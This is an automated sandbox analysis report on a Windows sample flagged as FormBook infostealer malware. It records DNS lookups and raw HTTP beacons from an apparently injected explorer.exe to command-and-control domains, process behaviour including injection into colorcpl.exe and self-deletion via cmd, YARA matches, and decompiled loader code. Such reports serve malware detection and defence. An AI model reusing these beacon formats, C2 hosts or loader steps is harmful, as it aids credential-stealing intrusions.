Mar 3, 2021 08:08:07.734126091 CET | 8.8.8.8 | 192.168.2.3 | 0xf3d8 | No error (0) | www.worldsourcecloud.com | | 172.67.223.7 | A (IP address) | IN (0x0001)
Mar 3, 2021 08:08:07.734126091 CET | 8.8.8.8 | 192.168.2.3 | 0xf3d8 | No error (0) | www.worldsourcecloud.com | | 104.21.78.148 | A (IP address) | IN (0x0001)
Mar 3, 2021 08:08:13.373378038 CET | 8.8.8.8 | 192.168.2.3 | 0x16ec | No error (0) | www.856380692.xyz | | 103.88.34.80 | A (IP address) | IN (0x0001)
Mar 3, 2021 08:08:36.667924881 CET | 8.8.8.8 | 192.168.2.3 | 0x1360 | No error (0) | www.856380692.xyz | | 103.88.34.80 | A (IP address) | IN (0x0001)
Mar 3, 2021 08:08:39.527894974 CET | 8.8.8.8 | 192.168.2.3 | 0x8719 | Name error (3) | www.clericallyco.com | none | none | A (IP address) | IN (0x0001)
Mar 3, 2021 08:08:44.610312939 CET | 8.8.8.8 | 192.168.2.3 | 0x2596 | Name error (3) | www.evoslancete.com | none | none | A (IP address) | IN (0x0001)
Mar 3, 2021 08:08:49.674992085 CET | 8.8.8.8 | 192.168.2.3 | 0x5891 | No error (0) | www.tencenttexts.com | tencenttexts.com | | CNAME (Canonical name) | IN (0x0001)
Mar 3, 2021 08:08:49.674992085 CET | 8.8.8.8 | 192.168.2.3 | 0x5891 | No error (0) | tencenttexts.com | | 184.168.131.241 | A (IP address) | IN (0x0001)
Mar 3, 2021 08:08:55.164676905 CET | 8.8.8.8 | 192.168.2.3 | 0x538e | No error (0) | www.glowtheblog.com | | 217.160.0.236 | A (IP address) | IN (0x0001)
Mar 3, 2021 08:09:00.473987103 CET | 8.8.8.8 | 192.168.2.3 | 0x95b8 | No error (0) | www.myfeezinc.com | | 170.178.168.203 | A (IP address) | IN (0x0001)
Mar 3, 2021 08:09:11.034506083 CET | 8.8.8.8 | 192.168.2.3 | 0xd80d | No error (0) | www.wholesalerbargains.com | wholesalerbargains.com | | CNAME (Canonical name) | IN (0x0001)
Mar 3, 2021 08:09:11.034506083 CET | 8.8.8.8 | 192.168.2.3 | 0xd80d | No error (0) | wholesalerbargains.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Mar 3, 2021 08:09:17.462021112 CET | 8.8.8.8 | 192.168.2.3 | 0x2c1d | No error (0) | www.usopencoverage.com | | 94.136.40.51 | A (IP address) | IN (0x0001)
Mar 3, 2021 08:09:22.627926111 CET | 8.8.8.8 | 192.168.2.3 | 0xe852 | No error (0) | www.explorerthecity.com | | 91.195.240.94 | A (IP address) | IN (0x0001)
• www.worldsourcecloud.com
• www.tencenttexts.com
• www.glowtheblog.com
• www.myfeezinc.com
• www.wholesalerbargains.com
                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    0192.168.2.349728172.67.223.780C:\Windows\explorer.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    Mar 3, 2021 08:08:07.800009966 CET1204OUTGET /nsag/?Ntfttf=nlvt&Bd68427=B6Y2gXStMnwX5XGKVuP/TmarUdW4V+m6LGGQinzk50iDzibEzn0GLWf4EBz+9KVsHtfB HTTP/1.1
                                                                                    Host: www.worldsourcecloud.com
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    Mar 3, 2021 08:08:07.990852118 CET1205INHTTP/1.1 403 Forbidden
                                                                                    Date: Wed, 03 Mar 2021 07:08:07 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: __cfduid=d22be81437ad17930f3ebd3bbdb127d9c1614755287; expires=Fri, 02-Apr-21 07:08:07 GMT; path=/; domain=.worldsourcecloud.com; HttpOnly; SameSite=Lax
                                                                                    Via: 1.1 google
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    cf-request-id: 0898836b1d00004c4f9338b000000001
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Iciya%2B5xBL%2F5aVgPTjXmDVNrNFNawHuFrO2jpNAz%2FhJp%2FVRs2Jpwt0O4unf6X6vRDcJhLf3gKgQqnSCAHvS36hQsplxirY4KxXg%2BKC7p4oDR25m3cvWq%2B8k%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 62a10824f8c14c4f-AMS
                                                                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                    Data Raw: 31 31 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                    Data Ascii: 113<!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
                                                                                    Mar 3, 2021 08:08:07.990875006 CET | 1205 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                    1 | 192.168.2.3 | 49739 | 184.168.131.241 | 80 | C:\Windows\explorer.exe
                                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                                    Mar 3, 2021 08:08:49.862536907 CET | 5822 | OUT | GET /nsag/?Ntfttf=nlvt&Bd68427=1KNBKkR/3sxsfy5Hm2m4k9rliP52H6WM2eUoblDVMc3evr5lbTgPZczIDguYEb443quL HTTP/1.1
                                                                                    Host: www.tencenttexts.com
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    Mar 3, 2021 08:08:50.060493946 CET | 5823 | IN | HTTP/1.1 301 Moved Permanently
                                                                                    Server: nginx/1.16.1
                                                                                    Date: Wed, 03 Mar 2021 07:08:49 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Location: https://www.grassfire.us/10CentTexting?Ntfttf=nlvt&Bd68427=1KNBKkR/3sxsfy5Hm2m4k9rliP52H6WM2eUoblDVMc3evr5lbTgPZczIDguYEb443quL
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                    2 | 192.168.2.3 | 49740 | 217.160.0.236 | 80 | C:\Windows\explorer.exe
                                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                                    Mar 3, 2021 08:08:55.212816954 CET | 5824 | OUT | GET /nsag/?Bd68427=HzZPNJQ+T/L7/MBs4vfaT6k2sBckkYigm/Q2Kch6th6kZXuKq++LfRIjkyQoyiPFVyMQ&Ntfttf=nlvt HTTP/1.1
                                                                                    Host: www.glowtheblog.com
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    Mar 3, 2021 08:08:55.259952068 CET | 5824 | IN | HTTP/1.1 301 Moved Permanently
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Content-Length: 334
                                                                                    Connection: close
                                                                                    Date: Wed, 03 Mar 2021 07:08:55 GMT
                                                                                    Server: Apache
                                                                                    Location: https://www.glowtheblog.com/nsag/?Bd68427=HzZPNJQ+T/L7/MBs4vfaT6k2sBckkYigm/Q2Kch6th6kZXuKq++LfRIjkyQoyiPFVyMQ&Ntfttf=nlvt
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6c 6f 77 74 68 65 62 6c 6f 67 2e 63 6f 6d 2f 6e 73 61 67 2f 3f 42 64 36 38 34 32 37 3d 48 7a 5a 50 4e 4a 51 2b 54 2f 4c 37 2f 4d 42 73 34 76 66 61 54 36 6b 32 73 42 63 6b 6b 59 69 67 6d 2f 51 32 4b 63 68 36 74 68 36 6b 5a 58 75 4b 71 2b 2b 4c 66 52 49 6a 6b 79 51 6f 79 69 50 46 56 79 4d 51 26 61 6d 70 3b 4e 74 66 74 74 66 3d 6e 6c 76 74 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.glowtheblog.com/nsag/?Bd68427=HzZPNJQ+T/L7/MBs4vfaT6k2sBckkYigm/Q2Kch6th6kZXuKq++LfRIjkyQoyiPFVyMQ&amp;Ntfttf=nlvt">here</a>.</p></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                    3 | 192.168.2.3 | 49741 | 170.178.168.203 | 80 | C:\Windows\explorer.exe
                                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                                    Mar 3, 2021 08:09:00.671694040 CET | 5825 | OUT | GET /nsag/?Ntfttf=nlvt&Bd68427=AXehkXJ24fX3Q+umAOPXC/XvfFX0gl1EYu2dc8RW2os5zkvGOL3BkU/yF/W58Bsr/nBR HTTP/1.1
                                                                                    Host: www.myfeezinc.com
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    Mar 3, 2021 08:09:00.904683113 CET | 5826 | IN | HTTP/1.1 302 Found
                                                                                    Date: Wed, 03 Mar 2021 07:09:00 GMT
                                                                                    Server: Apache/2.4.25 (Debian)
                                                                                    Set-Cookie: __tad=1614755340.5339234; expires=Sat, 01-Mar-2031 07:09:00 GMT; Max-Age=315360000
                                                                                    Location: http://ww25.myfeezinc.com/nsag/?Ntfttf=nlvt&Bd68427=AXehkXJ24fX3Q+umAOPXC/XvfFX0gl1EYu2dc8RW2os5zkvGOL3BkU/yF/W58Bsr/nBR&subid1=20210303-1809-0088-be0d-0c09ea32fcb7
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                    4 | 192.168.2.3 | 49742 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                                    Mar 3, 2021 08:09:11.130256891 CET | 5827 | OUT | GET /nsag/?Ntfttf=nlvt&Bd68427=S2rwVw3s97Y3rUXATn0CJ3djiO7xqRLsdPZLFd7esiUzXfKx0EjNJIkpU7K33DVUY0dk HTTP/1.1
                                                                                    Host: www.wholesalerbargains.com
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    Mar 3, 2021 08:09:11.269534111 CET | 5827 | IN | HTTP/1.1 403 Forbidden
                                                                                    Server: openresty
                                                                                    Date: Wed, 03 Mar 2021 07:09:11 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 275
                                                                                    ETag: "60363547-113"
                                                                                    Via: 1.1 google
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                    Code Manipulations

                                                                                    Statistics

                                                                                    CPU Usage


                                                                                    Memory Usage


                                                                                    High Level Behavior Distribution

                                                                                    • File
                                                                                    • Network


                                                                                    Behavior


                                                                                    System Behavior

                                                                                    Start time:08:07:08
                                                                                    Start date:03/03/2021
                                                                                    Path:C:\Users\user\Desktop\Nz7NA3F7z7.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\Desktop\Nz7NA3F7z7.exe'
                                                                                    Imagebase:0x400000
                                                                                    File size:223664 bytes
                                                                                    MD5 hash:059A1308EBDFAE6EE52FD646D341AEAC
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.222946934.00000000022F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.222946934.00000000022F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.222946934.00000000022F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Reputation:low
                                                                                    Start time:08:07:09
                                                                                    Start date:03/03/2021
                                                                                    Path:C:\Users\user\Desktop\Nz7NA3F7z7.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\Desktop\Nz7NA3F7z7.exe'
                                                                                    Imagebase:0x400000
                                                                                    File size:223664 bytes
                                                                                    MD5 hash:059A1308EBDFAE6EE52FD646D341AEAC
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.275429619.00000000005E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.275429619.00000000005E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.275429619.00000000005E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.220049197.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.220049197.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.220049197.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.275382730.0000000000590000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.275382730.0000000000590000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.275382730.0000000000590000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Reputation:low
                                                                                    Start time:08:07:34
                                                                                    Start date:03/03/2021
                                                                                    Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\SysWOW64\colorcpl.exe
                                                                                    Imagebase:0x13e0000
                                                                                    File size:86528 bytes
                                                                                    MD5 hash:746F3B5E7652EA0766BA10414D317981
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.484188593.0000000001320000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.484188593.0000000001320000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.484188593.0000000001320000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.484311977.0000000001350000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.484311977.0000000001350000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.484311977.0000000001350000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Reputation:moderate
                                                                                    Start time:08:07:38
                                                                                    Start date:03/03/2021
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:/c del 'C:\Users\user\Desktop\Nz7NA3F7z7.exe'
                                                                                    Imagebase:0x3f0000
                                                                                    File size:232960 bytes
                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Start time:08:07:38
                                                                                    Start date:03/03/2021
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff6b2800000
                                                                                    File size:625664 bytes
                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    Disassembly

                                                                                    Code Analysis

                                                                                    Executed Functions

                                                                                    C-Code - Quality: 78%
                                                                                    			_entry_() {
                                                                                    				intOrPtr _t47;
                                                                                    				CHAR* _t51;
                                                                                    				char* _t54;
                                                                                    				CHAR* _t56;
                                                                                    				void* _t60;
                                                                                    				intOrPtr _t62;
                                                                                    				int _t64;
                                                                                    				char* _t67;
                                                                                    				char* _t68;
                                                                                    				int _t69;
                                                                                    				char* _t71;
                                                                                    				char* _t74;
                                                                                    				int _t91;
                                                                                    				void* _t95;
                                                                                    				void* _t107;
                                                                                    				intOrPtr* _t108;
                                                                                    				char _t111;
                                                                                    				CHAR* _t116;
                                                                                    				char* _t117;
                                                                                    				CHAR* _t118;
                                                                                    				char* _t119;
                                                                                    				void* _t121;
                                                                                    				char* _t123;
                                                                                    				char* _t125;
                                                                                    				char* _t126;
                                                                                    				void* _t128;
                                                                                    				void* _t129;
                                                                                    				char _t147;
                                                                                    
                                                                                    				 *(_t129 + 0x20) = 0;
                                                                                    				 *((intOrPtr*)(_t129 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
                                                                                    				 *(_t129 + 0x1c) = 0;
                                                                                    				 *(_t129 + 0x18) = 0x20;
                                                                                    				SetErrorMode(0x8001); // executed
                                                                                    				if(GetVersion() != 6) {
                                                                                    					_t108 = E00405F57(0);
                                                                                    					if(_t108 != 0) {
                                                                                    						 *_t108(0xc00);
                                                                                    					}
                                                                                    				}
                                                                                    				_t118 = "UXTHEME";
                                                                                    				goto L4;
                                                                                    				while(1) {
                                                                                    					L22:
                                                                                    					_t111 =  *_t56;
                                                                                    					_t134 = _t111;
                                                                                    					if(_t111 == 0) {
                                                                                    						break;
                                                                                    					}
                                                                                    					__eflags = _t111 - 0x20;
                                                                                    					if(_t111 != 0x20) {
                                                                                    						L10:
                                                                                    						__eflags =  *_t56 - 0x22;
                                                                                    						 *((char*)(_t129 + 0x14)) = 0x20;
                                                                                    						if( *_t56 == 0x22) {
                                                                                    							_t56 =  &(_t56[1]);
                                                                                    							__eflags = _t56;
                                                                                    							 *((char*)(_t129 + 0x14)) = 0x22;
                                                                                    						}
                                                                                    						__eflags =  *_t56 - 0x2f;
                                                                                    						if( *_t56 != 0x2f) {
                                                                                    							L20:
                                                                                    							_t56 = E004056E5(_t56,  *((intOrPtr*)(_t129 + 0x14)));
                                                                                    							__eflags =  *_t56 - 0x22;
                                                                                    							if(__eflags == 0) {
                                                                                    								_t56 =  &(_t56[1]);
                                                                                    								__eflags = _t56;
                                                                                    							}
                                                                                    							continue;
                                                                                    						} else {
                                                                                    							_t56 =  &(_t56[1]);
                                                                                    							__eflags =  *_t56 - 0x53;
                                                                                    							if( *_t56 == 0x53) {
                                                                                    								__eflags = (_t56[1] | 0x00000020) - 0x20;
                                                                                    								if((_t56[1] | 0x00000020) == 0x20) {
                                                                                    									_t14 = _t129 + 0x18;
                                                                                    									 *_t14 =  *(_t129 + 0x18) | 0x00000002;
                                                                                    									__eflags =  *_t14;
                                                                                    								}
                                                                                    							}
                                                                                    							__eflags =  *_t56 - 0x4352434e;
                                                                                    							if( *_t56 == 0x4352434e) {
                                                                                    								__eflags = (_t56[4] | 0x00000020) - 0x20;
                                                                                    								if((_t56[4] | 0x00000020) == 0x20) {
                                                                                    									_t17 = _t129 + 0x18;
                                                                                    									 *_t17 =  *(_t129 + 0x18) | 0x00000004;
                                                                                    									__eflags =  *_t17;
                                                                                    								}
                                                                                    							}
                                                                                    							__eflags =  *((intOrPtr*)(_t56 - 2)) - 0x3d442f20;
                                                                                    							if( *((intOrPtr*)(_t56 - 2)) == 0x3d442f20) {
                                                                                    								 *((intOrPtr*)(_t56 - 2)) = 0;
                                                                                    								__eflags =  &(_t56[2]);
                                                                                    								E00405BC7("C:\\Users\\hardz\\AppData\\Local\\Temp",  &(_t56[2]));
                                                                                    								L25:
                                                                                    								_t116 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
                                                                                    								GetTempPathA(0x400, _t116); // executed
                                                                                    								_t60 = E004030F9(_t134);
                                                                                    								_t135 = _t60;
                                                                                    								if(_t60 != 0) {
                                                                                    									L27:
                                                                                    									DeleteFileA("1033"); // executed
                                                                                    									_t62 = E00402C55(_t136,  *(_t129 + 0x18)); // executed
                                                                                    									 *((intOrPtr*)(_t129 + 0x10)) = _t62;
                                                                                    									if(_t62 != 0) {
                                                                                    										L37:
                                                                                    										E00403540();
                                                                                    										__imp__OleUninitialize();
                                                                                    										_t143 =  *((intOrPtr*)(_t129 + 0x10));
                                                                                    										if( *((intOrPtr*)(_t129 + 0x10)) == 0) {
                                                                                    											__eflags =  *0x42ecb4;
                                                                                    											if( *0x42ecb4 == 0) {
                                                                                    												L64:
                                                                                    												_t64 =  *0x42eccc;
                                                                                    												__eflags = _t64 - 0xffffffff;
                                                                                    												if(_t64 != 0xffffffff) {
                                                                                    													 *(_t129 + 0x1c) = _t64;
                                                                                    												}
                                                                                    												ExitProcess( *(_t129 + 0x1c));
                                                                                    											}
                                                                                    											_t126 = E00405F57(5);
                                                                                    											_t119 = E00405F57(6);
                                                                                    											_t67 = E00405F57(7);
                                                                                    											__eflags = _t126;
                                                                                    											_t117 = _t67;
                                                                                    											if(_t126 != 0) {
                                                                                    												__eflags = _t119;
                                                                                    												if(_t119 != 0) {
                                                                                    													__eflags = _t117;
                                                                                    													if(_t117 != 0) {
                                                                                    														_t74 =  *_t126(GetCurrentProcess(), 0x28, _t129 + 0x20);
                                                                                    														__eflags = _t74;
                                                                                    														if(_t74 != 0) {
                                                                                    															 *_t119(0, "SeShutdownPrivilege", _t129 + 0x28);
                                                                                    															 *(_t129 + 0x3c) = 1;
                                                                                    															 *(_t129 + 0x48) = 2;
                                                                                    															 *_t117( *((intOrPtr*)(_t129 + 0x34)), 0, _t129 + 0x2c, 0, 0, 0);
                                                                                    														}
                                                                                    													}
                                                                                    												}
                                                                                    											}
                                                                                    											_t68 = E00405F57(8);
                                                                                    											__eflags = _t68;
                                                                                    											if(_t68 == 0) {
                                                                                    												L62:
                                                                                    												_t69 = ExitWindowsEx(2, 0x80040002);
                                                                                    												__eflags = _t69;
                                                                                    												if(_t69 != 0) {
                                                                                    													goto L64;
                                                                                    												}
                                                                                    												goto L63;
                                                                                    											} else {
                                                                                    												_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
                                                                                    												__eflags = _t71;
                                                                                    												if(_t71 == 0) {
                                                                                    													L63:
                                                                                    													E0040140B(9);
                                                                                    													goto L64;
                                                                                    												}
                                                                                    												goto L62;
                                                                                    											}
                                                                                    										}
                                                                                    										E00405488( *((intOrPtr*)(_t129 + 0x14)), 0x200010);
                                                                                    										ExitProcess(2);
                                                                                    									}
                                                                                    									if( *0x42ec3c == 0) {
                                                                                    										L36:
                                                                                    										 *0x42eccc =  *0x42eccc | 0xffffffff;
                                                                                    										 *(_t129 + 0x1c) = E0040361A( *0x42eccc);
                                                                                    										goto L37;
                                                                                    									}
                                                                                    									_t123 = E004056E5(_t125, 0);
                                                                                    									while(_t123 >= _t125) {
                                                                                    										__eflags =  *_t123 - 0x3d3f5f20;
                                                                                    										if(__eflags == 0) {
                                                                                    											break;
                                                                                    										}
                                                                                    										_t123 = _t123 - 1;
                                                                                    										__eflags = _t123;
                                                                                    									}
                                                                                    									_t140 = _t123 - _t125;
                                                                                    									 *((intOrPtr*)(_t129 + 0x10)) = "Error launching installer";
                                                                                    									if(_t123 < _t125) {
                                                                                    										_t121 = E0040540F(_t143);
                                                                                    										lstrcatA(_t116, "~nsu");
                                                                                    										if(_t121 != 0) {
                                                                                    											lstrcatA(_t116, "A");
                                                                                    										}
                                                                                    										lstrcatA(_t116, ".tmp");
